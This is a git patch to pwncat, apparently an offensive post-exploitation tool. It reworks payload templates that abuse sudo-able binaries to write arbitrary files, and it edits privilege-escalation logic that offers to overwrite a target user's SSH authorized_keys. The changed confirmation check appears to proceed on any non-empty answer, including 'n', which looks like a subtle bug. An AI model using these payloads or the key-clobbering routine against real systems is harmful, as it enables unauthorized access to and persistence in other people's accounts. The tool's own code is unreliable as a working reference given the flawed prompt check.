From b9f3a572a78825e455cd405e9e2e76afc5ede885 Mon Sep 17 00:00:00 2001 From: Caleb Stewart Date: Wed, 13 May 2020 17:51:39 -0400 Subject: [PATCH] Tested authorized_keys clobbering with only a file-write primitive --- data/gtfobins.json | 10 ++++++++-- pwncat/privesc/__init__.py | 8 ++++---- 2 files changed, 12 insertions(+), 6 deletions(-) diff --git a/data/gtfobins.json b/data/gtfobins.json index 99c7c05..b2693c7 100644 --- a/data/gtfobins.json +++ b/data/gtfobins.json @@ -55,14 +55,20 @@ { "type": "write", "stream": "print", - "payload": "TF=$({mktemp}); {cat} - > $TF; {command}; rm -f $TF", + // This is weird because under the case where we are running w/ sudo, + // we need to ask for the password first. The first "{command}" will + // ask for the sudo password, then fail to copy. The second "{command}" + // will not ask for the sudo password, and then the copy will succeed. + // Without sudo, the first command will simply fail, and the second + // will succeed. This is the same for the other `cp` payload below. + "payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {cat} > $TF; {command}; rm -f $TF", "args": ["$TF", "{lfile}"], "exit": "{ctrl_d}" }, { "type": "write", "stream": "base64", - "payload": "TF=$({mktemp}); {base64} -d > $TF; {command}; rm -f $TF", + "payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF", "args": ["$TF", "{lfile}"], "exit": "{ctrl_d}" } diff --git a/pwncat/privesc/__init__.py b/pwncat/privesc/__init__.py index 22a28a2..9a811e6 100644 --- a/pwncat/privesc/__init__.py +++ b/pwncat/privesc/__init__.py @@ -22,7 +22,7 @@ from pwncat import util # privesc_methods = [SetuidMethod, SuMethod] # privesc_methods = [SuMethod, SudoMethod, SetuidMethod, DirtycowMethod, ScreenMethod] # privesc_methods = [SuMethod, SudoMethod, ScreenMethod, SetuidMethod] -privesc_methods = [SuMethod, SudoMethod, SetuidMethod] +privesc_methods = [SuMethod, SudoMethod] class Finder: @@ -160,7 +160,7 @@ class Finder: for tech in found_techniques: if ( tech.user == target_user - and Capability.READ in tech.capabilities + and Capability.WRITE in tech.capabilities ): try: tech.method.write_file(filename, data, tech) @@ -512,9 +512,9 @@ class Finder: ) util.warn(f"however, we do have a writer.") response = confirm( - "would you like to clobber their authorized keys?", suffix="(y/N)" + "would you like to clobber their authorized keys? ", suffix="(y/N) " ) - if response.lower() != "y": + if not response: raise PrivescError("user aborted key clobbering") # If we don't already know a private key, then we need a writer